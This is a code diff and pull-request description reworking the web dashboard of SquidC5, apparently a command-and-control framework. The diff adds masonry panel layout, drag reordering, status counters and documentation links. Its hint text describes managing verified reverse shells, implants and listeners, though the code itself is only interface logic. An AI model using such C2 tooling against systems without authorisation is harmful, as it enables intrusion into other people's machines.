+        <a class="doc-link summary-doc" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#event-stream" target="_blank" rel="noopener noreferrer" onclick="event.stopPropagation()">Docs</a>
+      </summary>
+      <p class="hint">Live activity from this C2: shell connect / verify / reject, listener changes, tasks, and other server events. Newest first; refreshes with the poll interval. <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#event-stream" target="_blank" rel="noopener noreferrer">Full docs →</a></p>
       <div class="event-feed" id="eventsBox">
         <div class="empty">Connect to load events</div>
       </div>
-    </section>
+    </details>
 
-    <div class="overview">
-      <div class="card shells-card">
-        <h2>Verified reverse shells</h2>
-        <p class="hint">Live TCP reverse shells that passed false-shell filtering and the exec probe (real command execution). Prefer these for interactive Shell commands. Dead/echo-only connections are reaped automatically.</p>
+    <details class="panel hero" id="heroPanel">
+      <summary>Status overview <a class="doc-link summary-doc" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#status-overview" target="_blank" rel="noopener noreferrer" onclick="event.stopPropagation()">Docs</a></summary>
+      <div class="hero-host" id="hostLine">not connected</div>
+      <p class="hint" style="margin-top:0">At-a-glance C2 health: sessions, listeners, implant traffic, AI usage, and host uptime. Values refresh with the poll interval. <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#status-overview" target="_blank" rel="noopener noreferrer">Full docs →</a></p>
+      <div class="stats">
+        <div class="stat tone-ok"><div class="n" id="nVerified">—</div><div class="l">Verified shells</div></div>
+        <div class="stat tone-pink"><div class="n" id="nListeners">—</div><div class="l">Listeners up</div></div>
+        <div class="stat tone-cyan"><div class="n" id="nSessions">—</div><div class="l">Active sessions</div></div>
+        <div class="stat tone-purple"><div class="n" id="nTasks">—</div><div class="l">Open tasks</div></div>
+        <div class="stat tone-ok"><div class="n" id="nBeacons">—</div><div class="l">HTTP hits</div></div>
+        <div class="stat tone-warn"><div class="n" id="nStabilized">—</div><div class="l">Stabilized</div></div>
+        <div class="stat tone-bad"><div class="n" id="nFalsePos">—</div><div class="l">False shells</div></div>
+        <div class="stat tone-purple"><div class="n" id="nAi">—</div><div class="l">AI calls</div></div>
+        <div class="stat tone-cyan"><div class="n" id="nUptime">—</div><div class="l">Uptime</div></div>
+      </div>
+    </details>
+
+    <div class="overview masonry" id="overviewMount">
+      <details class="panel shells-card" id="shellsPanel">
+        <summary>Verified reverse shells <a class="doc-link summary-doc" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#verified-reverse-shells-overview-card" target="_blank" rel="noopener noreferrer" onclick="event.stopPropagation()">Docs</a></summary>
+        <p class="hint">Live TCP reverse shells that passed false-shell filtering and the exec probe (real command execution). Prefer these for interactive Shell commands. Dead/echo-only connections are reaped automatically. <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#shell" target="_blank" rel="noopener noreferrer">Full docs →</a></p>
         <div id="shellsBox" class="empty">No verified shells</div>
-      </div>
+      </details>
 
-      <div class="card listeners-card">
-        <h2>Listeners</h2>
-        <p class="hint">Bound acceptors on this host (name, port, kind, status). Running listeners are what implants and reverse shells connect to. Create/start more under the Listeners panel below.</p>
+      <details class="panel listeners-card" id="listenersOverviewPanel">
+        <summary>Listeners <a class="doc-link summary-doc" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#listeners" target="_blank" rel="noopener noreferrer" onclick="event.stopPropagation()">Docs</a></summary>
+        <p class="hint">Bound acceptors on this host (name, port, kind, status). Running listeners are what implants and reverse shells connect to. Create/start more under the Listeners panel below. <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#listeners" target="_blank" rel="noopener noreferrer">Full docs →</a></p>
         <div id="listenersBox" class="empty">—</div>
-      </div>
+      </details>
 
-      <div class="card signal-card">
-        <h2>Signal</h2>
-        <p class="hint">Quick status chips from the last poll (health, feature hints, session counts). Use this to confirm the API is reachable and the server is not in a degraded state.</p>
+      <details class="panel signal-card" id="signalPanel">
+        <summary>Signal <a class="doc-link summary-doc" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#signal" target="_blank" rel="noopener noreferrer" onclick="event.stopPropagation()">Docs</a></summary>
+        <p class="hint">Quick status chips from the last poll (health, feature hints, session counts). Use this to confirm the API is reachable and the server is not in a degraded state. <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md#signal" target="_blank" rel="noopener noreferrer">Full docs →</a></p>
         <div class="chips" id="chips"><span class="chip">—</span></div>
         <p class="muted" id="healthLine" style="margin:8px 0 0">—</p>
-      </div>
+      </details>
     </div>
 
     <!-- Admin UI injected after server-side scope check -->
-    <div id="adminMount"></div>
+    <div id="adminMount" class="masonry"></div>
 
     <footer>
       <div id="footer">Last update: never</div>
       <div style="margin-top:4px;letter-spacing:0.12em;text-transform:uppercase;font-size:0.62rem">
         <strong style="color:var(--pink)">SquidC5</strong> · authorized ops only
+      </div>
+      <div style="margin-top:8px;font-size:0.72rem">
+        <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/user-guide.md" target="_blank" rel="noopener noreferrer">User guide (GitHub)</a>
+        ·
+        <a class="doc-link" href="https://github.com/DotNetRussell/SquidC5/blob/master/docs/README.md" target="_blank" rel="noopener noreferrer">Docs index</a>
       </div>
     </footer>
   </div>
@@ -422,7 +590,14 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
 
   <script>
     const $ = (id) => document.getElementById(id);
-    const KEYS = { url: "sc5_dash_url", token: "sc5_dash_token", refresh: "sc5_dash_refresh" };
+    const KEYS = {
+      url: "sc5_dash_url",
+      token: "sc5_dash_token",
+      refresh: "sc5_dash_refresh",
+      layoutOverview: "sc5_layout_overview",
+      layoutAdmin: "sc5_layout_admin",
+      layoutWide: "sc5_layout_wide",
+    };
     let timer = null;
     let tokenVisible = false;
     let lastShare = "";
@@ -535,13 +710,492 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
     function applyPanelDefaults() {
       const desktop = isDesktopLayout();
       const hasToken = !!(($("token") && $("token").value) || "").trim();
+      // Every container is a details.panel — expand on desktop, collapse on mobile
       document.querySelectorAll("details.panel").forEach((el) => {
         if (el.id === "settingsPanel") return;
         el.open = desktop;
       });
       // Connection stays collapsed when already configured
       $("settingsPanel").open = !hasToken;
+      scheduleMasonry();
     }
+
+    let masonryTimer = null;
+    function isFullWidthPanel(el) {
+      return !!(el && (el.classList.contains("is-wide") || el.classList.contains("masonry-span")));
+    }
+    function masonryCols() {
+      const w = window.innerWidth || document.documentElement.clientWidth || 0;
+      if (w >= 1100) return 3;
+      if (w >= 768) return 2;
+      return 1;
+    }
+    function masonryGap() {
+      return (window.innerWidth || 0) >= 1100 ? 18 : 14;
+    }
+    function clearMasonry(container) {
+      if (!container) return;
+      container.classList.remove("is-packed");
+      container.style.height = "";
+      Array.from(container.children).forEach((el) => {
+        el.style.position = "";
+        el.style.left = "";
+        el.style.top = "";
+        el.style.width = "";
+        el.style.transform = "";
+        el.style.height = "";
+        el.style.maxHeight = "";
+        el.style.overflow = "";
+        const body = el.querySelector && el.querySelector(":scope > .panel-body");
+        if (body) {
+          body.style.height = "";
+          body.style.maxHeight = "";
+          body.style.overflowY = "";
+          body.style.overflowX = "";
+        }
+      });
+    }
+    function tileHeightPx(el) {
+      if (!el || !el.open) return 0;
+      if (isAutoHeightPanel(el)) return 0;
+      const cs = getComputedStyle(document.documentElement);
+      const raw = isFullWidthPanel(el)
+        ? (cs.getPropertyValue("--panel-tile-h-wide") || "400px")
+        : (cs.getPropertyValue("--panel-tile-h") || "340px");
+      const n = parseFloat(raw);
+      return Number.isFinite(n) ? n : (isFullWidthPanel(el) ? 400 : 340);
+    }
+    function isAutoHeightPanel(el) {
+      return !!(el && (el.id === "heroPanel" || el.classList.contains("hero")));
+    }
+    function applyTileScroll(el) {
+      const body = el && el.querySelector(":scope > .panel-body");
+      if (!body) return;
+      if (!el.open) {
+        body.style.height = "";
+        body.style.maxHeight = "";
+        body.style.overflowY = "";
+        body.classList.remove("scroll-focus", "is-scrollable");
+        el.style.height = "";
+        el.style.maxHeight = "";
+        el.style.overflow = "";
+        return;
+      }
+      // Status overview: natural height, never a fixed scroll tile
+      if (isAutoHeightPanel(el)) {
+        el.style.height = "auto";
+        el.style.maxHeight = "none";
+        el.style.overflow = "visible";
+        body.style.height = "auto";
+        body.style.maxHeight = "none";
+        body.style.overflowY = "visible";
+        body.style.overflowX = "visible";
+        body.classList.remove("scroll-focus", "is-scrollable");
+        return;
+      }
+      const tileH = tileHeightPx(el);
+      el.style.height = tileH + "px";
+      el.style.maxHeight = tileH + "px";
+      el.style.overflow = "hidden";
+      // Reserve summary + padding so body is the only scrollport
+      const sum = el.querySelector(":scope > summary");
+      const sumH = sum ? sum.getBoundingClientRect().height : 40;
+      const pad = 22; // vertical padding inside details
+      const bodyH = Math.max(80, tileH - sumH - pad);
+      body.style.height = bodyH + "px";
+      body.style.maxHeight = bodyH + "px";
+      body.style.overflowY = "auto";
+      body.style.overflowX = "hidden";
+      // Mark whether this body can scroll (for wheel policy)
+      requestAnimationFrame(() => {
+        const canScroll = body.scrollHeight > body.clientHeight + 1;
+        body.classList.toggle("is-scrollable", canScroll);
+        if (!canScroll) body.classList.remove("scroll-focus");
+      });
+    }
+
+    // Wheel: page scrolls freely unless a scrollable panel-body was clicked (focused).
+    let scrollFocusBody = null;
+    function clearScrollFocus() {
+      document.querySelectorAll(".panel-body.scroll-focus").forEach((el) => {
+        el.classList.remove("scroll-focus");
+      });
+      scrollFocusBody = null;
+    }
+    function bodyCanScroll(el) {
+      return !!(el && el.scrollHeight > el.clientHeight + 1);
+    }
+    document.addEventListener("pointerdown", (e) => {
+      const body = e.target.closest && e.target.closest(".panel-body");
+      if (body && bodyCanScroll(body)) {
+        if (scrollFocusBody && scrollFocusBody !== body) {
+          scrollFocusBody.classList.remove("scroll-focus");
+        }
+        scrollFocusBody = body;
+        body.classList.add("scroll-focus");
+        body.classList.add("is-scrollable");
+      } else if (!e.target.closest || !e.target.closest(".panel-body")) {
+        // Click outside any panel body → release focus so page can scroll
+        clearScrollFocus();
+      } else {
+        // Clicked a non-scrollable panel body — do not trap
+        clearScrollFocus();
+      }
+    }, true);
+    document.addEventListener(
+      "wheel",
+      (e) => {
+        const body = e.target.closest && e.target.closest(".panel-body");
+        // Default: never stop page scroll
+        if (!body) return;
+        // Only the focused, actually-scrollable body may consume wheel
+        if (body !== scrollFocusBody || !bodyCanScroll(body)) return;
+        const dy = e.deltaY;
+        if (dy === 0) return;
+        const max = body.scrollHeight - body.clientHeight;
+        const top = body.scrollTop;
+        const atTop = top <= 0;
+        const atBottom = top >= max - 1;
+        // Scroll the body ourselves; prevent page only while this focused body can move
+        if ((dy < 0 && !atTop) || (dy > 0 && !atBottom)) {
+          e.preventDefault();
+          body.scrollTop = Math.min(max, Math.max(0, top + dy));
+        }
+        // At edges: let the event bubble so the page can scroll
+      },
+      { passive: false, capture: true }
+    );
+    function packMasonry(container) {
+      if (!container) return;
+      const cols = masonryCols();
+      const gap = masonryGap();
+      if (cols <= 1) {
+        clearMasonry(container);
+        // still enforce tile scroll on single column
+        Array.from(container.children).forEach((el) => {
+          if (el.matches && el.matches("details.panel")) applyTileScroll(el);
+        });
+        return;
+      }
+      const items = Array.from(container.children).filter((el) => el.nodeType === 1 && !el.classList.contains("hidden"));
+      if (!items.length) {
+        clearMasonry(container);
+        return;
+      }
+      const width = container.clientWidth;
+      if (width < 40) return;
+      const colW = (width - gap * (cols - 1)) / cols;
+      container.classList.add("is-packed");
+
+      // Size tiles first (equal height + scrollport), then pack.
+      items.forEach((el) => {
+        const full = isFullWidthPanel(el);
+        el.style.position = "absolute";
+        el.style.left = "0px";
+        el.style.top = "0px";
+        el.style.width = (full ? width : colW) + "px";
+        if (el.matches && el.matches("details.panel")) applyTileScroll(el);
+        else el.style.height = "";
+      });
+      void container.offsetHeight;
+
+      // Pack in DOM order. Full-width tiles force a hard row break:
+      // all columns advance past that tile so nothing sits beside it.
+      const heights = new Array(cols).fill(0);
+      items.forEach((el) => {
+        const full = isFullWidthPanel(el);
+        const h = el.open ? tileHeightPx(el) : Math.max(el.offsetHeight, 44);
+        if (full) {
+          const y = Math.max.apply(null, heights);
+          el.style.left = "0px";
+          el.style.top = y + "px";
+          el.style.width = width + "px";
+          const next = y + h + gap;
+          for (let i = 0; i < cols; i++) heights[i] = next;
+          return;
+        }
+        let col = 0;
+        for (let i = 1; i < cols; i++) if (heights[i] < heights[col]) col = i;
+        const y = heights[col];
+        el.style.left = (col * (colW + gap)) + "px";
+        el.style.top = y + "px";
+        el.style.width = colW + "px";
+        heights[col] = y + h + gap;
+      });
+
+      container.style.height = Math.max.apply(null, heights) + "px";
+    }
+    function layoutMasonry() {
+      // Non-masonry panels (connection / status / events) still need scrollports
+      document.querySelectorAll("details.panel").forEach((el) => {
+        const inMasonry = el.closest(".masonry");
+        if (!inMasonry) applyTileScroll(el);
+      });
+      packMasonry(document.querySelector(".overview"));
+      packMasonry($("adminMount"));
+    }
+    function scheduleMasonry() {
+      if (masonryTimer) clearTimeout(masonryTimer);
+      masonryTimer = setTimeout(() => {
+        requestAnimationFrame(() => {
+          layoutMasonry();
+          // second pass after fonts/details open reflow
+          requestAnimationFrame(layoutMasonry);
+        });
+      }, 40);
+    }
+    window.addEventListener("resize", scheduleMasonry);
+    document.addEventListener("toggle", (e) => {
+      if (e.target && e.target.matches && e.target.matches("details.panel")) scheduleMasonry();
+    }, true);
+
+    // ----- Card reorder (browser localStorage only — never sent to C2) -----
+    function loadLayoutOrder(key) {
+      try {
+        const raw = localStorage.getItem(key);
+        if (!raw) return null;
+        const arr = JSON.parse(raw);
+        return Array.isArray(arr) ? arr.filter((x) => typeof x === "string") : null;
+      } catch (_) {
+        return null;
+      }
+    }
+    function saveLayoutOrder(container, key) {
+      if (!container || !key) return;
+      const ids = Array.from(container.children)
+        .map((el) => el.id)
+        .filter((id) => id);
+      try {
+        localStorage.setItem(key, JSON.stringify(ids));
+      } catch (_) {}
+    }
+    function applyLayoutOrder(container, key) {
+      if (!container || !key) return;
+      const order = loadLayoutOrder(key);
+      if (!order || !order.length) return;
+      const byId = new Map();
+      Array.from(container.children).forEach((el) => {
+        if (el.id) byId.set(el.id, el);
+      });
+      order.forEach((id) => {
+        const el = byId.get(id);
+        if (el) {
+          container.appendChild(el);
+          byId.delete(id);
+        }
+      });
+      byId.forEach((el) => container.appendChild(el));
+    }
+    function loadWideIds() {
+      try {
+        const raw = localStorage.getItem(KEYS.layoutWide);
+        if (!raw) return new Set();
+        const arr = JSON.parse(raw);
+        return new Set(Array.isArray(arr) ? arr.filter((x) => typeof x === "string") : []);
+      } catch (_) {
+        return new Set();
+      }
+    }
+    function saveWideIds(set) {
+      try {
+        localStorage.setItem(KEYS.layoutWide, JSON.stringify(Array.from(set)));
+      } catch (_) {}
+    }
+    function applyWideState(root) {
+      const wide = loadWideIds();
+      (root || document).querySelectorAll("details.panel[id]").forEach((el) => {
+        el.classList.toggle("is-wide", wide.has(el.id));
+        const btn = el.querySelector(":scope > summary .wide-btn");
+        if (btn) {
+          btn.setAttribute("aria-pressed", wide.has(el.id) ? "true" : "false");
+          btn.title = wide.has(el.id) ? "Use normal tile width" : "Expand to full row";
+        }
+      });
+    }
+    function toggleWide(panel) {
+      if (!panel || !panel.id) return;
+      const wide = loadWideIds();
+      if (wide.has(panel.id)) wide.delete(panel.id);
+      else wide.add(panel.id);
+      saveWideIds(wide);
+      panel.classList.toggle("is-wide", wide.has(panel.id));
+      const btn = panel.querySelector(":scope > summary .wide-btn");
+      if (btn) {
+        btn.setAttribute("aria-pressed", wide.has(panel.id) ? "true" : "false");
+        btn.title = wide.has(panel.id) ? "Use normal tile width" : "Expand to full row";
+      }
+      // Full-row cards force a hard row break — repack so neighbors drop below
+      scheduleMasonry();
+    }
+    function ensurePanelBodies(root) {
+      const scope = root || document;
+      scope.querySelectorAll("details.panel").forEach((el) => {
+        if (el.querySelector(":scope > .panel-body")) return;
+        const body = document.createElement("div");
+        body.className = "panel-body";
+        Array.from(el.childNodes).forEach((n) => {
+          if (n.nodeType === 1 && n.tagName === "SUMMARY") return;
+          body.appendChild(n);
+        });
+        el.appendChild(body);
+      });
+    }
+    function ensureDragHandles(container) {
+      if (!container) return;
+      Array.from(container.children).forEach((el) => {
+        if (!el.matches || !el.matches("details.panel")) return;
+        if (!el.id) el.id = "panel_" + Math.random().toString(36).slice(2, 9);
+        const sum = el.querySelector(":scope > summary");
+        if (!sum) return;
+        if (!sum.querySelector(".drag-handle")) {
+          const h = document.createElement("span");
+          h.className = "drag-handle";
+          h.draggable = true;
+          h.title = "Drag to reorder (saved in this browser only)";
+          h.textContent = "⋮⋮";
+          h.addEventListener("click", (e) => {
+            e.preventDefault();
+            e.stopPropagation();
+          });
+          sum.insertBefore(h, sum.firstChild);
+        }
+        if (!sum.querySelector(".panel-title")) {
+          const title = document.createElement("span");
+          title.className = "panel-title";
+          // move existing text nodes / non-control children into title
+          const nodes = Array.from(sum.childNodes).filter((n) => {
+            if (n.nodeType === 1 && (n.classList.contains("drag-handle") || n.classList.contains("wide-btn") || n.classList.contains("event-stream-head"))) return false;
+            return true;
+          });
+          if (nodes.length) {
+            nodes.forEach((n) => title.appendChild(n));
+            const handle = sum.querySelector(".drag-handle");
+            if (handle && handle.nextSibling) sum.insertBefore(title, handle.nextSibling);
+            else sum.appendChild(title);
+          }
+        }
+        if (!sum.querySelector(".wide-btn")) {
+          const b = document.createElement("button");
+          b.type = "button";
+          b.className = "wide-btn";
+          b.textContent = "⟷";
+          b.title = "Expand to full row";
+          b.addEventListener("click", (e) => {
+            e.preventDefault();
+            e.stopPropagation();
+            toggleWide(el);
+          });
+          sum.appendChild(b);
+        }
+      });
+    }
+    function ensurePanelChrome(root) {
+      ensurePanelBodies(root);
+      const overview = document.querySelector(".overview");
+      const admin = $("adminMount");
+      ensureDragHandles(overview);
+      ensureDragHandles(admin);
+      // wide buttons on non-masonry panels too (connection/hero/events)
+      document.querySelectorAll("details.panel").forEach((el) => {
+        if (overview && overview.contains(el)) return;
+        if (admin && admin.contains(el)) return;
+        if (!el.id) return;
+        const sum = el.querySelector(":scope > summary");
+        if (!sum || sum.querySelector(".wide-btn")) return;
+        if (!sum.querySelector(".panel-title") && !sum.querySelector(".event-stream-head")) {
+          const title = document.createElement("span");
+          title.className = "panel-title";
+          while (sum.firstChild) title.appendChild(sum.firstChild);
+          sum.appendChild(title);
+        }
+        const b = document.createElement("button");
+        b.type = "button";
+        b.className = "wide-btn";
+        b.textContent = "⟷";
+        b.title = "Expand to full row";
+        b.addEventListener("click", (e) => {
+          e.preventDefault();
+          e.stopPropagation();
+          toggleWide(el);
+        });
+        sum.appendChild(b);
+      });
+      // wire wide buttons from admin HTML templates
+      document.querySelectorAll("details.panel > summary .wide-btn").forEach((btn) => {
+        if (btn.dataset.bound === "1") return;
+        btn.dataset.bound = "1";
+        btn.addEventListener("click", (e) => {
+          e.preventDefault();
+          e.stopPropagation();
+          const panel = btn.closest("details.panel");
+          toggleWide(panel);
+        });
+      });
+      applyWideState(root);
+    }
+    function enableCardReorder(container, storageKey) {
+      if (!container || container.dataset.reorderBound === "1") return;
+      container.dataset.reorderBound = "1";
+      let dragEl = null;
+
+      container.addEventListener("dragstart", (e) => {
+        const handle = e.target.closest(".drag-handle");
+        if (!handle || !container.contains(handle)) return;
+        const panel = handle.closest("details.panel");
+        if (!panel || panel.parentElement !== container) return;
+        dragEl = panel;
+        panel.classList.add("is-dragging");
+        try {
+          e.dataTransfer.effectAllowed = "move";
+          e.dataTransfer.setData("text/plain", panel.id || "panel");
+        } catch (_) {}
+      });
+
+      container.addEventListener("dragend", () => {
+        if (dragEl) dragEl.classList.remove("is-dragging");
+        container.querySelectorAll(".drag-over").forEach((el) => el.classList.remove("drag-over"));
+        dragEl = null;
+        saveLayoutOrder(container, storageKey);
+        scheduleMasonry();
+      });
+
+      container.addEventListener("dragover", (e) => {
+        if (!dragEl) return;
+        e.preventDefault();
+        try { e.dataTransfer.dropEffect = "move"; } catch (_) {}
+        const over = e.target.closest("details.panel");
+        if (!over || over === dragEl || over.parentElement !== container) return;
+        container.querySelectorAll(".drag-over").forEach((el) => {
+          if (el !== over) el.classList.remove("drag-over");
+        });
+        over.classList.add("drag-over");
+        const rect = over.getBoundingClientRect();
+        const before = e.clientY < rect.top + rect.height / 2;
+        if (before) container.insertBefore(dragEl, over);
+        else container.insertBefore(dragEl, over.nextSibling);
+      });
+
+      container.addEventListener("drop", (e) => {
+        e.preventDefault();
+        container.querySelectorAll(".drag-over").forEach((el) => el.classList.remove("drag-over"));
+        if (dragEl) {
+          saveLayoutOrder(container, storageKey);
+          scheduleMasonry();
+        }
+      });
+    }
+    function setupReorderableLayouts() {
+      const overview = document.querySelector(".overview");
+      const admin = $("adminMount");
+      ensurePanelChrome(document);
+      applyLayoutOrder(overview, KEYS.layoutOverview);
+      applyLayoutOrder(admin, KEYS.layoutAdmin);
+      enableCardReorder(overview, KEYS.layoutOverview);
+      enableCardReorder(admin, KEYS.layoutAdmin);
+      scheduleMasonry();
+    }
+    window.__SC5_setupReorder = setupReorderableLayouts;
+
     function fmtUptime(sec) {
       sec = Math.floor(Number(sec) || 0);
       const h = Math.floor(sec / 3600), m = Math.floor((sec % 3600) / 60);
@@ -600,6 +1254,7 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
       if (state.adminLoaded) return true;
       if (!cfg().token) {
         $("adminMount").innerHTML = "";
+        delete $("adminMount").dataset.reorderBound;
         return false;
       }
       try {
@@ -612,6 +1267,7 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
         });
         if (res.status === 403 || res.status === 401) {
           $("adminMount").innerHTML = "";
+          delete $("adminMount").dataset.reorderBound;
           return false;
         }
         if (!res.ok) {
@@ -632,6 +1288,8 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
         document.body.appendChild(s);
         state.adminLoaded = true;
         applyPanelDefaults();
+        setupReorderableLayouts();
+        scheduleMasonry();
         return true;
       } catch (e) {
         showError("Ops console unavailable: " + (e.message || e));
@@ -770,10 +1428,12 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
         try { await ensureConsoleUi(); } catch (_) {}
 
         const soft = async (fn) => { try { return await fn(); } catch (_) { return null; } };
-        const [health, metrics, shellRows, lis, aiSt] = await Promise.all([
+        const [health, metrics, shellRows, allSessions, tasks, lis, aiSt] = await Promise.all([
           soft(() => api("GET", "/api/v1/health")),
           soft(() => api("GET", "/api/v1/metrics")),
           soft(() => api("GET", "/api/v1/sessions?status=active&live_only=true&kind=reverse_shell,tcp")),
+          soft(() => api("GET", "/api/v1/sessions?status=active")),
+          soft(() => api("GET", "/api/v1/tasks")),
           soft(() => api("GET", "/api/v1/listeners")),
           soft(() => api("GET", "/api/v1/ai/status")),
         ]);
@@ -788,16 +1448,31 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
           : "connected";
 
         const verified = (shellRows || []).filter((s) => s.kind === "reverse_shell" || s.kind === "tcp");
+        const m = (metrics && metrics.metrics) || {};
+        const setStat = (id, val) => { if ($(id)) $(id).textContent = val == null || val === "" ? "—" : String(val); };
+        setStat("nSessions", Array.isArray(allSessions) ? allSessions.length : "—");
+        const taskList = Array.isArray(tasks) ? tasks : (tasks && tasks.tasks) || [];
+        const openTasks = (taskList || []).filter((t) => {
+          const st = String((t && t.status) || "").toLowerCase();
+          return !st || st === "pending" || st === "queued" || st === "running" || st === "in_progress";
+        });
+        setStat("nTasks", Array.isArray(taskList) ? openTasks.length : "—");
+        setStat("nBeacons", m["http.hits"] != null ? m["http.hits"] : (m["implant.beacon"] != null ? m["implant.beacon"] : 0));
+        setStat("nStabilized", m["shell.stabilized"] != null ? m["shell.stabilized"] : 0);
+        setStat("nFalsePos", m["shell.false_positive"] != null ? m["shell.false_positive"] : 0);
+        setStat("nAi", m["ai.admin.calls"] != null ? m["ai.admin.calls"] : 0);
+
         renderShells(verified);
         renderListeners(lis || []);
         if (metrics) {
           renderEvents(metrics);
-          renderChips(metrics.metrics || {});
+          renderChips(m);
         }
         if (aiSt && window.__SC5_renderAi) window.__SC5_renderAi(aiSt);
 
         $("footer").textContent =
           `Updated ${new Date().toLocaleTimeString()} · ${verified.length} verified · refresh ${c.refresh}s`;
+        scheduleMasonry();
       } catch (e) {
         $("statusBadge").textContent = "error";
         $("statusBadge").className = "badge bad";
@@ -842,6 +1517,7 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
       saveSettings();
       state.adminLoaded = false;
       $("adminMount").innerHTML = "";
+      delete $("adminMount").dataset.reorderBound;
       $("settingsPanel").open = !(($("token").value || "").trim());
       schedule();
       refresh();
@@ -875,6 +1551,7 @@ var qrcode=function(){var t=function(t,r){var e=t,n=g[r],o=null,i=0,a=null,u=[],
         </div>`;
     } else {
       loadSettings();
+      setupReorderableLayouts();
       if (cfg().url && cfg().token) { schedule(); refresh(); }
       else showError("Enter Server URL + token, then Save & Connect.");
     }


### PR DESCRIPTION
## Summary
- Ops layout: masonry, equal tiles, full-row toggle, scroll fixes, reorder (localStorage)
- Event stream above status; expanded stats; color punch-up
- Status overview auto-height; panel bottom padding
- Comprehensive docs/user-guide.md (GitHub only) + Docs links from every ops panel

## Test plan
- [ ] /ops layout, wide toggle, scroll focus behavior
- [ ] Docs links open GitHub anchors
- [ ] /docs still disabled on server